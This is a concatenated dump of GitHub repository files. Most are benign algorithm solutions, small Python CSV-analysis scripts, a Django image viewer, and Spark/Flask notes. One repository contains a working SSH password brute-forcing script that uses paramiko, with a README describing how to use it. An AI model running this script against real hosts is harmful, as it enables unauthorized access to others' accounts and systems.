.ssh/\nls -l #single file per line ls with read/write notation\nchmod 600 <filename>.pem #change read write privileges for your pem file\nls -a #hidden folders in home folder\n\n# path to spark EC2 scropt: ~/spark-1.5.0-bin-hadoop1/ec2/spark-ec2\n[path to your spark-ec2 script] -k [key name] -i [path to your pem file] -r [aws region] -s 6 --copy-aws-credentials --ebs-vol-size=64 launch [give your cluster a name] #command line command to launch cluster using default settings\n\n#ie command line code:\n/usr/local/spark-1.5.0-bin-hadoop2.6/ec2/spark-ec2 -k sparkler -i ~/pem_files/sparkler.pem -r us-west-1 -s 6 --copy-aws-credentials --ebs-vol-size=64 launch my_cluster\n\n#scp transfer installation scripts (or files in general) to cluster master\nscp -i <path to pem file> <file to copy> root@<your master DNS>:/root/.\n\n#ie scp code to transfer files\nscp -i ~/pem_files/sparkler.pem install_scripts/install_these [email protected]:/root/.\n\n#log into cluster and run installation scripts\n[path to your spark-ec2 script] -k [key name] -i [path to your pem file] -r [aws region] login [the name of your cluster]\n\nsource install_these # install install files from cluster master terminal\n\n#\"Pause\" or stop cluster (does not terminate)\n[path to your spark-ec2 script] -k [key name] -i [path to your pem file] -r [aws region] stop [the name of your cluster]\n\n#restart paused/stopped cluster\n[path to your spark-ec2 script] -k [key name] -i [path to your pem file] -r [aws region] start [the name of your cluster]\n\n\n\n# Flask for python web servers\nfrom flask import Flask, request\napp = Flask(__name__) #requisite first line for a flask script, 
instantiating the app class for use throughout the script\[email protected]('/') #defines each page, / alone is root\napp.run(host='0.0.0.0', port=8080, debug=True) #put under main block, debug=True allows for autoreload for debugging code edits in real time\n\n\n\n\n#Pickle\nimport cPickle as pickle #cPickle is faster than pickle\n\nwith open(\"model.pkl\", 'w') as f: #how to \"pickle\" a model named model into file model.pkl\n pickle.dump(model, f)\n\nwith open(\"model.pkl\") as f_un: #to unpickle a model to use\n model_unpickled = pickle.load(f_un)\n'''\n\n\n\n```\n" }, { "alpha_fraction": 0.5779816508293152, "alphanum_fraction": 0.5963302850723267, "avg_line_length": 23.22222137451172, "blob_id": "c13be91dd9116269a75c74c8e0c27af91c772844", "content_id": "0ca3d88ddbc8dae0a54950f8a05435f6e9f192fd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 436, "license_type": "no_license", "max_line_length": 55, "num_lines": 18, "path": "/160601 Code Review Questions.py", "repo_name": "geoffisdancing/galnotes", "src_encoding": "UTF-8", "text": "# Code questions\n\n\n# array.shape[0]\ndef bootstrap(arr, iterations=10000):\n if type(arr) != np.ndarray:\n arr = np.array(arr)\n\n if len(arr.shape) < 2:\n arr = arr[:, np.newaxis]\n\n nrows = arr.shape[0]\n boot_samples = []\n for _ in xrange(iterations):\n row_inds = np.random.randint(nrows, size=nrows)\n boot_sample = arr[row_inds, :]\n boot_samples.append(boot_sample)\n return boot_samples\n" } ]
3
simoncastellanos9/python-challenge
https://github.com/simoncastellanos9/python-challenge
25d1f6bdfd80be9dccc9968c09dc102b88cc6d63
ce385bcfe599a933b1a20515bf674558b1e75042
206f7ffbdee7e62e43e961519422bb54d777e4c7
refs/heads/main
2023-04-25T04:20:29.802578
2021-05-08T19:17:11
2021-05-08T19:17:11
363,179,421
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5986021161079407, "alphanum_fraction": 0.60259610414505, "avg_line_length": 30.809524536132812, "blob_id": "ebd1c0a8891ba9f112b207921aa40ef8fe7b4c35", "content_id": "83e931b5b3ddb0faf86cf2721307a9e7512238c5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2003, "license_type": "no_license", "max_line_length": 115, "num_lines": 63, "path": "/PyPoll/main.py", "repo_name": "simoncastellanos9/python-challenge", "src_encoding": "UTF-8", "text": "import os\nimport csv\n\ncsvpath = os.path.join('Resources','election_data.csv')\n\nwith open(csvpath) as csvfile:\n # CSV reader specifies delimiter and variable that holds contents\n csvreader = csv.reader(csvfile, delimiter=',')\n\n # Read the header row first (skip this step if there is now header)\n csv_header = next(csvreader)\n\n candidates = []\n votes = []\n perVotes = []\n electionresults = []\n maxVotes = 0\n\n #Create unique list for candidates, and initial list for votes and percentage according to number of candidates\n for row in csvreader:\n if row[2] not in candidates:\n candidates.append(row[2])\n votes.append(0)\n perVotes.append(0)\n electionresults.append(row[2])\n \n\n totalVotes = (int(len(electionresults)))\n\n #Print to terminal\n print(\"Election Results\\n-------------------------\")\n print(f\"Total Votes: {totalVotes}\\n-------------------------\")\n\n for i in range(len(candidates)):\n for candidate in electionresults:\n if candidate == candidates[i]:\n votes[i] = votes[i] + 1 \n perVotes[i] = \"{:.3%}\".format(votes[i]/totalVotes) \n print(f\"{candidates[i]}: {perVotes[i]} ({votes[i]})\")\n if votes[i] > maxVotes:\n maxVotes = votes[i]\n winner = candidates[i]\n\n print(f\"-------------------------\\nWinner: {winner}\\n-------------------------\")\n\n\ncandidatesZip = zip(candidates,perVotes,votes)\n\n\noutput_path = os.path.join(\"analysis\", \"results.csv\")\n\n# Open the file using \"write\" mode. 
Specify the variable to hold the contents\nwith open(output_path, 'w') as csvfile:\n\n # Initialize csv.writer\n csvwriter = csv.writer(csvfile, delimiter=',')\n\n # Write the first row (column headers)\n csvwriter.writerow([\"Election Results\"])\n csvwriter.writerow(['Total Votes: ',totalVotes])\n for w in range(len(candidates)):\n csvwriter.writerows(candidatesZip)\n csvwriter.writerow(['Winner: ',winner])" }, { "alpha_fraction": 0.6009986400604248, "alphanum_fraction": 0.6105310916900635, "avg_line_length": 29.52777862548828, "blob_id": "f5fe228100fb1e0d91d319f2692a6b674381da91", "content_id": "3b177c4490f42c834ef982d269df5e09f215b56b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2203, "license_type": "no_license", "max_line_length": 112, "num_lines": 72, "path": "/PyBank/main.py", "repo_name": "simoncastellanos9/python-challenge", "src_encoding": "UTF-8", "text": "import os\nimport csv\n\ncsvpath = os.path.join('Resources', 'budget_data.csv')\n\nwith open(csvpath) as csvfile:\n csvreader = csv.reader(csvfile, delimiter=',')\n\n # Read the header row first (skip this step if there is now header)\n csv_header = next(csvreader)\n\n total = 0\n i = 0\n length = 0\n prevRow = 0\n change = 0\n changeCnt = 0\n greatInc = 0\n greatDec = 0\n\n #Calculate info from csv file\n for row in csvreader:\n total = total + int(row[1])\n #has to start counting change at second row\n length = length + 1\n if length>1:\n change = int(row[1])-prevRow\n if change > greatInc:\n greatInc = change\n greatIncMonth = row[0]\n if change < greatDec:\n greatDec = change\n greatDecMonth = row[0]\n changeCnt = changeCnt + change\n #place holder to calculate difference\n prevRow = int(row[1])\n \n #Format to currency\n total = \"${:.0f}\".format(total)\n aveChange = \"${:.2f}\".format(int(changeCnt/(length-1)))\n greatInc = \"${:.0f}\".format(greatInc)\n greatDec = \"${:.0f}\".format(greatDec)\n\n #Print to terminal\n print(\"\\nFinancial Analysis\\n----------------------------\")\n print(f\"Total Months: {length}\")\n print(f\"Total: {total}\")\n print(f\"Average Change: {aveChange}\")\n print(f\"Greatest Increase in Profits: {greatIncMonth} ({greatInc})\")\n print(f\"Greatest Decrease in Profits: {greatDecMonth} ({greatDec})\")\n\n\nindex = [\"Total Months\",\"Total\",\"Average Change\", \"Greatest Increase in Profits\",\"Greatest Decrease in Profits\"]\nvar = [length,total,aveChange,greatInc,greatDec]\nmont = [\"\",\"\",\"\",greatIncMonth,greatDecMonth]\n\nrows = zip(index, var, mont)\n\noutput_path = os.path.join(\"analysis\", \"results.csv\")\n\n# Open the file using \"write\" mode. 
Specify the variable to hold the contents\nwith open(output_path, 'w') as csvfile:\n\n # Initialize csv.writer\n csvwriter = csv.writer(csvfile, delimiter=',')\n\n # Write the first row (column headers)\n csvwriter.writerow([\"Financial Analysis\", \"QTY\", \"Month\"])\n\n #Write the second row\n for w in range(5):\n csvwriter.writerows(rows)\n \n" }, { "alpha_fraction": 0.7714460492134094, "alphanum_fraction": 0.7714460492134094, "avg_line_length": 57.32143020629883, "blob_id": "17613443257da9e3d1698ec419e88a66feddff35", "content_id": "b64a5b75539cc5216f0c0d54ec45a7aa18a1aca8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1632, "license_type": "no_license", "max_line_length": 246, "num_lines": 28, "path": "/README.md", "repo_name": "simoncastellanos9/python-challenge", "src_encoding": "UTF-8", "text": "# python-challenge\nFinancial Record &amp; Voter Analysis\n\nPyBank\n\n- This python script analyzes the financial records of my company. We are given a set of financial data called budget_data.csv. The dataset is composed of two columns: `Date` and `Profit/Losses`. This script calculates and displays the following:\n - The total number of months included in the dataset\n - The net total amount of \"Profit/Losses\" over the entire period\n - The average of the changes in \"Profit/Losses\" over the entire period\n - The greatest increase in profits (date and amount) over the entire period\n - The greatest decrease in losses (date and amount) over the entire period\n\n- In addition, the script both prints the analysis to the terminal and export a text file with the results.\n\nPyPoll\n\n- For this challenge, we were tasked with helping a small, rural town modernize its vote counting process.\n\n- We were given a set of poll data called election_data.csv. The dataset is composed of three columns: `Voter ID`, `County`, and `Candidate`. Our task was to create a Python script that analyzed the votes and calculated each of the following:\n - The total number of votes casted\n - A complete list of candidates who received votes\n - The percentage of votes each candidate won\n - The total number of votes each candidate won\n - The winner of the election based on popular vote.\n \n- In addition, the final script both prints the analysis to the terminal and exports a text file with the results.\n\n **The election_data.csv file given was too big to upload into the github repository. Had to use gitignore so that the code could still run." } ]
3
illbelove/testrepo
https://github.com/illbelove/testrepo
73c4842a7faf7fe800131bc21e556088a5b99b8e
f36438c050054f7f0ceac0727e57c9e091dd1b3b
72c030d321bd4a584e190d8879363bd209db44e9
refs/heads/main
2022-12-28T13:37:15.488127
2020-10-18T03:22:45
2020-10-18T03:22:45
304,928,362
0
0
null
2020-10-17T17:07:26
2020-10-18T03:01:32
2020-10-18T03:22:46
Python
[ { "alpha_fraction": 0.7333333492279053, "alphanum_fraction": 0.7333333492279053, "avg_line_length": 21.5, "blob_id": "2387e9b7ee4963f175fd2fbb8375c27ac1db0e0f", "content_id": "3b8f767186405aea38df02cf4e716f1dc961a5bd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 45, "license_type": "no_license", "max_line_length": 24, "num_lines": 2, "path": "/firstpython.py", "repo_name": "illbelove/testrepo", "src_encoding": "UTF-8", "text": "# display of output\nprint(\"New Python file\")\n" } ]
1
FelipeLeal/django_images
https://github.com/FelipeLeal/django_images
ba372307df82b3d1959c38b9f39e0a01357be021
58b5c01bd2733283775e74b84b9f0b0365f2a900
b47fdabe99335e2ad1b1d6f99b51f54133581f58
refs/heads/master
2021-09-24T16:42:14.067073
2020-04-12T04:50:19
2020-04-12T04:50:19
245,237,592
0
0
null
2020-03-05T18:22:47
2020-04-12T04:50:46
2021-09-22T18:52:11
Python
[ { "alpha_fraction": 0.7058823704719543, "alphanum_fraction": 0.7058823704719543, "avg_line_length": 22.272727966308594, "blob_id": "17d1581e4dae51d8bb1cf8755ebdf9aa7b8bee6f", "content_id": "6a3521b542a2ab5997704843f699b070a00679df", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 255, "license_type": "no_license", "max_line_length": 63, "num_lines": 11, "path": "/viewer/admin.py", "repo_name": "FelipeLeal/django_images", "src_encoding": "UTF-8", "text": "from django.contrib import admin\nfrom .models import Photo\n\nclass AdminPhoto(admin.ModelAdmin):\n list_display = ['nickname', 'petname', 'image url', 'rank']\n\n class Meta:\n model = Photo\n\n# Register your models here.\nadmin.site.register(Photo)" }, { "alpha_fraction": 0.6424078941345215, "alphanum_fraction": 0.6424078941345215, "avg_line_length": 33.78125, "blob_id": "57159f256550f4960751c2114df7efb333f9f4b0", "content_id": "a8312c2baf29562a4d3ee6efe9cf12c8ece1152a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1113, "license_type": "no_license", "max_line_length": 77, "num_lines": 32, "path": "/viewer/views.py", "repo_name": "FelipeLeal/django_images", "src_encoding": "UTF-8", "text": "from django.shortcuts import render, redirect\nfrom django.core.files.storage import FileSystemStorage\nfrom .forms import PhotoForm\nfrom .models import Photo\n\n# Create your views here.\n\ndef home(request):\n images = Photo.objects.all()\n return render(request, 'index.html', {'title': 'home' ,'images': images})\n\ndef simple_upload(request):\n # TODO: Make a form to catch values to insert on database\n if request.method == 'POST' and request.FILES['myfile']:\n my_file = request.FILES['myfile']\n fs = FileSystemStorage()\n filename = fs.save(my_file.name, my_file)\n uploaded_file_url = fs.url(filename)\n return render(request, 'upload.html', {\n 'uploaded_file_url': uploaded_file_url\n })\n return render(request, 'upload.html', {'title': 'Upload'})\n\ndef model_form_upload(request):\n if request.method == 'POST':\n form = PhotoForm(request.POST, request.FILES)\n if form.is_valid():\n form.save()\n return redirect('home')\n else:\n form = PhotoForm()\n return render(request, 'upload.html', {'form': form})\n" }, { "alpha_fraction": 0.6631578803062439, "alphanum_fraction": 0.6631578803062439, "avg_line_length": 26.285715103149414, "blob_id": "816ada0077fa03fab82d00db2b3c256e88a3ec72", "content_id": "15d75c28c2d45a8a7998fca02bec83dc885e1a3a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 190, "license_type": "no_license", "max_line_length": 60, "num_lines": 7, "path": "/viewer/forms.py", "repo_name": "FelipeLeal/django_images", "src_encoding": "UTF-8", "text": "from django import forms\nfrom viewer.models import Photo\n\nclass PhotoForm(forms.ModelForm):\n class Meta:\n model = Photo\n fields = ('nickname', 'pet_name', 'img_dir', 'rank')" }, { "alpha_fraction": 0.6836363673210144, "alphanum_fraction": 0.7054545283317566, "avg_line_length": 33.25, "blob_id": "e2180849418d7bb148275851e5ab5371d82d813a", "content_id": "351ca85bf7c732274b75f2a5e08ff8cb126a0cfe", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 275, "license_type": "no_license", "max_line_length": 62, "num_lines": 8, "path": "/viewer/models.py", "repo_name": "FelipeLeal/django_images", "src_encoding": "UTF-8", "text": "from django.db import models\n\n# 
Create your models here.\nclass Photo(models.Model):\n nickname = models.CharField(max_length=255)\n pet_name = models.CharField(max_length=255)\n img_dir = models.ImageField(upload_to='uploads/%Y/%m/%d/')\n rank = models.FloatField()\n\n" }, { "alpha_fraction": 0.7209302186965942, "alphanum_fraction": 0.7906976938247681, "avg_line_length": 13.333333015441895, "blob_id": "4b1a9c94a7235f9a5f0c9ab2491d137339d6fa06", "content_id": "afdf98eb4cd8fcec16b5df40aec1dde5083a3397", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 43, "license_type": "no_license", "max_line_length": 21, "num_lines": 3, "path": "/requirements.txt", "repo_name": "FelipeLeal/django_images", "src_encoding": "UTF-8", "text": "Django==3.0.3\nPillow\ndjango-webpack-loader\n" }, { "alpha_fraction": 0.7054263353347778, "alphanum_fraction": 0.7054263353347778, "avg_line_length": 20.66666603088379, "blob_id": "78f218aa01d911b426c45df7c09021e78f50e8be", "content_id": "4d547737fe588c02777d74d5bbce02e78ee53a9d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 129, "license_type": "no_license", "max_line_length": 60, "num_lines": 6, "path": "/README.MD", "repo_name": "FelipeLeal/django_images", "src_encoding": "UTF-8", "text": "# Image viewer Django\n\nImage viewer with [Django](https://pypi.org/project/Django/)\n\n## Tools\n* [docker](https://www.docker.com/)" } ]
6
prathamshiwal/SSH-Bruteforcer
https://github.com/prathamshiwal/SSH-Bruteforcer
fe522c941e72b14cb31f6e722258bd40a9d9ed00
45b587977cbb490e1f6c3656a5b245f646fba701
f38d53c6da55636fc91b6045c15b09d1ae602d10
refs/heads/master
2023-04-23T15:12:07.150906
2021-05-16T16:20:22
2021-05-16T16:20:22
367,926,608
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.8125, "alphanum_fraction": 0.8125, "avg_line_length": 107.80000305175781, "blob_id": "9de9ed7ecbeee023192cb64f4c5fe78b0540d25c", "content_id": "ce9f6aaf18f507781e1f4a2cf29f9adeab1dcabd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 544, "license_type": "no_license", "max_line_length": 257, "num_lines": 5, "path": "/README.md", "repo_name": "prathamshiwal/SSH-Bruteforcer", "src_encoding": "UTF-8", "text": "# SSH-Bruteforcer\n\nThis is basic SSH bruteforcing tool. There are two scripts which are different in terms of there working speed. the script sshbruteforcer-slow.py works slow and sshbruteforcer.py works fater because it uses threading to attempt passwords on the SSH service.\nThese Scripts require a Taget IP on which the SSH service is running and also needs the name of the user for that particular IP Address.\nA Password file (e.g. basicpassfile.txt, longpassfile.txt) is also needed to bruteforce the SSH service with different passwords.\n" }, { "alpha_fraction": 0.5701133012771606, "alphanum_fraction": 0.5764872431755066, "avg_line_length": 31.06818199157715, "blob_id": "1f4de811f6c8be4127370826769c29fe16d9bd4b", "content_id": "cf780630cf61979b5ed98be12cc1b321175faf6e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1412, "license_type": "no_license", "max_line_length": 143, "num_lines": 44, "path": "/sshbruteforcer-slow.py", "repo_name": "prathamshiwal/SSH-Bruteforcer", "src_encoding": "UTF-8", "text": "import paramiko, sys, os, socket, termcolor\n\n\ndef ssh_connect(password, code=0):\n ssh = paramiko.SSHClient()\n ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n\n try:\n ssh.connect(host, port=22, username=username, password=password)\n except paramiko.AuthenticationException:\n code = 1\n except socket.error as e:\n code = 2\n\n ssh.close()\n return code\n\n\nhost = input(termcolor.colored('[+] Target Address: ', 'blue'))\nusername = input(termcolor.colored('[+] SSH Username: ', 'blue'))\npass_file = input(termcolor.colored('[+] Password File/Path: ', 'blue'))\n\nif os.path.exists(pass_file) == False:\n print(termcolor.colored('[!!] File/Path Does Not Exist.', 'yellow'))\n sys.exit(1)\n\nwith open(pass_file, 'r') as file:\n for line in file.readlines():\n password = line.strip()\n try:\n response = ssh_connect(password)\n \n if response == 0:\n print(termcolor.colored('[+] Found Password: ', 'green') + password + termcolor.colored(' , For Account ', 'green') + username)\n break\n elif response == 1:\n print(termcolor.colored('[-] Incorrect Login: ', 'red') + password)\n else:\n print(termcolor.colored((\"[!!] Can't Connect\"), 'orange'))\n sys.exit(1)\n\n except Exception as e:\n print(e)\n pass\n\n" } ]
2
yegyeom/Algorithm
https://github.com/yegyeom/Algorithm
ae0aef2d0c2275dd6d8ad4d1584c7d7a872e35bb
32e8ac4098b8e541bdf060c29bd673c13bbb8a1f
6fa3663cb3e73ebbbaeff1b984b450fb97f6312e
refs/heads/main
2023-07-01T23:48:38.359556
2022-06-28T09:16:44
2022-06-28T09:16:44
331,221,416
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.316546767950058, "alphanum_fraction": 0.38309353590011597, "avg_line_length": 15.878787994384766, "blob_id": "ebec607c7d6942d5e20b716930ff3a579d112d1a", "content_id": "d9f0651a284c0090b76445a514f762bed3df9824", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 586, "license_type": "no_license", "max_line_length": 58, "num_lines": 33, "path": "/BOJ/Brute Force/1065.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 1065번: 한수\n2021-05-18\nBrute Force\n*/\n#include <iostream>\nusing namespace std;\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int n, ans=0;\n cin >> n;\n\n for(int i = 1 ; i <= n ; i++){\n if(i < 100){\n ans++;\n continue;\n }\n else{\n int n1 = i % 10; // 일의 자리\n int n2 = (i / 10) % 10; // 십의 자리\n int n3 = i / 100; // 십의 자리\n\n if(n3 - n2 == n2 - n1){\n ans++;\n }\n }\n }\n\n cout << ans;\n\n return 0;\n}" }, { "alpha_fraction": 0.4126712381839752, "alphanum_fraction": 0.45034247636795044, "avg_line_length": 15.714285850524902, "blob_id": "08ecc5168ce2c50627601ace02824bbfc361f7a5", "content_id": "3ba80cad7f3a7b88aa95e6c2f225e402be575fcc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 598, "license_type": "no_license", "max_line_length": 58, "num_lines": 35, "path": "/BOJ/Greedy/1715.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 1715번: 카드 정렬하기\nDATE: 2022-01-30\n*/\n#include <iostream>\n#include <queue>\nusing namespace std;\n\nint main() {\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n priority_queue<int, vector<int>, greater<int>> pq;\n int n, num, ans = 0;\n cin >> n;\n\n for(int i = 0 ; i < n ; i++) {\n cin >> num;\n pq.push(num);\n }\n\n while(pq.size() > 1) {\n int sum = 0;\n\n for(int i = 0 ; i < 2 ; i++) {\n sum += pq.top();\n pq.pop();\n }\n\n ans += sum;\n pq.push(sum);\n }\n\n cout << ans;\n\n return 0;\n}" }, { "alpha_fraction": 0.4514435827732086, "alphanum_fraction": 0.4842519760131836, "avg_line_length": 14.895833015441895, "blob_id": "119716bbe1c37e59fd0d4f8523473ab7c3dbd6ad", "content_id": "e51878c919884a0fc3047a84ca6ba98cefca174b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 766, "license_type": "no_license", "max_line_length": 64, "num_lines": 48, "path": "/BOJ/BFS_DFS/15649.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 15649번: N과 M (1)\n2022-01-04\nBacktracking\n*/\n#include <iostream>\n#include <vector>\n#define MAX 8\nusing namespace std;\n\nint n, m;\nvector<int> num;\nvector<int> ans; \nbool visited[MAX]; \n\nvoid print(){\n for(int i = 0 ; i < ans.size() ; i++) cout << ans[i] << \" \";\n cout << '\\n';\n}\n\nvoid dfs(int cnt){\n if(cnt == m) {\n print();\n return;\n }\n\n for(int i = 0 ; i < n ; i++){\n if(visited[i]) continue;\n\n ans.push_back(num[i]);\n visited[i] = true;\n\n dfs(cnt + 1);\n \n ans.pop_back();\n visited[i] = false;\n }\n}\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n cin >> n >> m;\n\n for(int i = 0 ; i < n ; i++) num.push_back(i + 1);\n dfs(0);\n\n return 0;\n}" }, { "alpha_fraction": 0.3942953050136566, "alphanum_fraction": 0.4194630980491638, "avg_line_length": 24.934782028198242, "blob_id": "a00c127308289c600769e6a188000fa3d3762efb", "content_id": "11a17fbdd07e69a1ce8a11f94c96b6d7c3ee7421", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": 
"C++", "length_bytes": 1232, "license_type": "no_license", "max_line_length": 60, "num_lines": 46, "path": "/programmers/Level 1/number_strings_and_english_words.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "//programmers Level 1: 숫자 문자열과 영단어\n//2021 카카오 채용연계형 인턴십\n//2021-09-21\n#include <string>\n#include <vector>\n#include <iostream>\n\nusing namespace std;\n\nint solution(string s) {\n int answer = 0;\n string str;\n \n for(int i = 0 ; i < s.length() ; i++){\n if(!isdigit(s[i])) {\n string tmp;\n \n while(1) {\n if(tmp == \"zero\") {str += \"0\"; break;}\n else if(tmp == \"one\"){ str += \"1\"; break;}\n else if(tmp == \"two\") {str += \"2\"; break;}\n else if(tmp == \"three\") {str += \"3\"; break;}\n else if(tmp == \"four\") {str += \"4\"; break;}\n else if(tmp == \"five\") {str += \"5\"; break;}\n else if(tmp == \"six\") {str += \"6\"; break;}\n else if(tmp == \"seven\") {str += \"7\"; break;}\n else if(tmp == \"eight\") {str += \"8\"; break;}\n else if(tmp == \"nine\") {str += \"9\"; break;}\n tmp += s[i++];\n }\n i--;\n }\n else str += s[i];\n }\n \n answer = stoi(str);\n\n return answer;\n}\n\nint main(){\n int answer = solution(\"2three45sixseven\");\n cout << answer;\n\n return 0;\n}" }, { "alpha_fraction": 0.5038202404975891, "alphanum_fraction": 0.5213482975959778, "avg_line_length": 23.733333587646484, "blob_id": "bce3dc850f11534397611503369057a072ab11b1", "content_id": "5f16e1359a4bf381ca3975cb62593dc8db1559e0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2409, "license_type": "no_license", "max_line_length": 79, "num_lines": 90, "path": "/BOJ/Implementation/1713.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UHC", "text": "/*\nBOJ 1713번: 후보 추천하기\nDATE: 2021-07-17\n*/\n#include <iostream>\n#include <map>\n#include <vector>\n#include <algorithm>\nusing namespace std;\nmap <int, pair<int, int>> m; //추천받은 학생, (추천 수, 들어온 시기)\n\nbool cmp1(const pair<int,pair<int,int>>& a, const pair<int, pair<int,int>>& b){\n if(a.second.first == b.second.first) return a.first < b.first;\n return a.second.first < b.second.first;\n}\n\nbool cmp2(const pair<int,pair<int,int>>& a, const pair<int, pair<int,int>>& b){\n if(a.second.second == b.second.second) return a.first < b.first;\n return a.second.second < b.second.second;\n}\n\nvoid insert(int student, int n){\n if(m.find(student) != m.end()){ //해당 학생이 이미 존재\n m[student].first++; \n }\n else{ //새로운 학생 삽입\n m[student].first = 1;\n m[student].second = n;\n }\n}\n\nvoid erase(int student, int n){\n if(m.find(student) != m.end()){\n m[student].first++;\n return;\n }\n\n vector<pair<int,pair<int,int>>> vec1(m.begin(), m.end());\n sort(vec1.begin(), vec1.end(), cmp1); //추천 순으로 정렬\n\n int recommend = vec1[0].second.first, cnt=0;\n\n for(auto it : vec1){\n if(it.second.first == recommend) cnt++;\n }\n\n if(cnt == 1){ //추천 횟수 제일 적은 학생 삭제\n m.erase(vec1[0].first);\n } \n else if(cnt > 1){ //추천 수 가장 적은 학생이 두 명 이상\n map<int, pair<int,int>> same_r;\n\n for(auto it : vec1){\n if(recommend == it.second.first){\n same_r[it.first].first = it.second.first; //추천 수\n same_r[it.first].second = it.second.second; //들어온 시기\n }\n }\n\n vector<pair<int,pair<int,int>>> vec2(same_r.begin(), same_r.end());\n sort(vec2.begin(), vec2.end(), cmp2); //들어온 시기 순으로 정렬\n \n m.erase(vec2[0].first);\n }\n \n insert(student, n);\n}\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int n, r, student;\n cin >> n >> r;\n\n for(int i = 0 ; i < r ; i++){\n cin >> 
student;\n\n if(m.size() < n){ //삽입\n insert(student, i); \n }\n else if(m.size() == n){ //삭제\n erase(student, i);\n }\n }\n\n for(auto it = m.begin() ; it != m.end() ; it++){\n cout << it->first << \" \";\n }\n\n return 0;\n}" }, { "alpha_fraction": 0.43234673142433167, "alphanum_fraction": 0.5010570883750916, "avg_line_length": 23.28205108642578, "blob_id": "34a02e5b7129b0c28878e5b5688f5f45d31ab84e", "content_id": "8a93a5dab894cd00baefdc3fcb1400e7ce2e31b8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 954, "license_type": "no_license", "max_line_length": 107, "num_lines": 39, "path": "/programmers/Level 1/mock_test.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "//programmers Level 1: 모의고사\n//2021-09-30\n#include <iostream>\n#include <algorithm>\n#include <string>\n#include <vector>\n\nusing namespace std;\n\nvector<int> vec1 = {1, 2, 3, 4, 5}, vec2 = {2, 1, 2, 3, 2, 4, 2, 5}, vec3 = {3, 3, 1, 1, 2, 2, 4, 4, 5, 5};\n\nvector<int> solution(vector<int> answers) {\n vector<int> ans(3), answer;\n int ans1 = 0, ans2 = 0, ans3 = 0;\n \n for(int i = 0 ; i < answers.size() ; i++){\n if(vec1[i % vec1.size()] == answers[i]) ans[0]++;\n if(vec2[i % vec2.size()] == answers[i]) ans[1]++;\n if(vec3[i % vec3.size()] == answers[i]) ans[2]++;\n }\n\n int max_score = max(max(ans[0], ans[1]), ans[2]);\n \n for(int i = 0 ; i < 3 ; i++){\n if(ans[i] == max_score) answer.push_back(i + 1);\n }\n \n return answer;\n}\n\nint main() {\n vector<int> answer = solution({1, 3, 2, 4, 2});\n \n for(int i = 0 ; i < answer.size() ; i++) {\n cout << answer[i];\n }\n\n return 0;\n}" }, { "alpha_fraction": 0.4557739496231079, "alphanum_fraction": 0.48402947187423706, "avg_line_length": 17.11111068725586, "blob_id": "437a0627db97ded88082bfc1c02a81ec5fb7097e", "content_id": "c0cd727ed9a9da0168e6d9fc4a055abcbee9c423", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 836, "license_type": "no_license", "max_line_length": 48, "num_lines": 45, "path": "/programmers/Level 2/k_prime_number.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nprogrammers Level 2: k진수에서 소수 개수 구하기\n2022 KAKAO BLIND RECRUITMENT\nDATE: 2022-04-02\n*/\n#include <string>\n#include <vector>\n#include <algorithm>\n#include <math.h>\nusing namespace std;\n\nint answer = 0;\n\nbool isPrime(long long num){\n if(num < 2) return false;\n \n for(long long i = 2 ; i <= sqrt(num) ; i++){\n if(num % i == 0) return false;\n }\n \n return true;\n}\n\nint solution(int n, int k) {\n string str, tmp = \"\";\n \n while(n > 0){\n str += n % k + 48;\n n /= k;\n }\n \n reverse(str.begin(), str.end());\n \n for(int i = 0 ; i < str.length() ; i++){\n if(str[i] == '0' && tmp.length() > 0){\n if(isPrime(stoi(tmp))) answer++;\n tmp = \"\";\n }\n else tmp += str[i];\n }\n \n if(isPrime(stoll(tmp))) answer++;\n \n return answer;\n}" }, { "alpha_fraction": 0.4396551847457886, "alphanum_fraction": 0.4913793206214905, "avg_line_length": 14.5, "blob_id": "87f4fa7eab2ac87b463e11db9d39e807fd23e95d", "content_id": 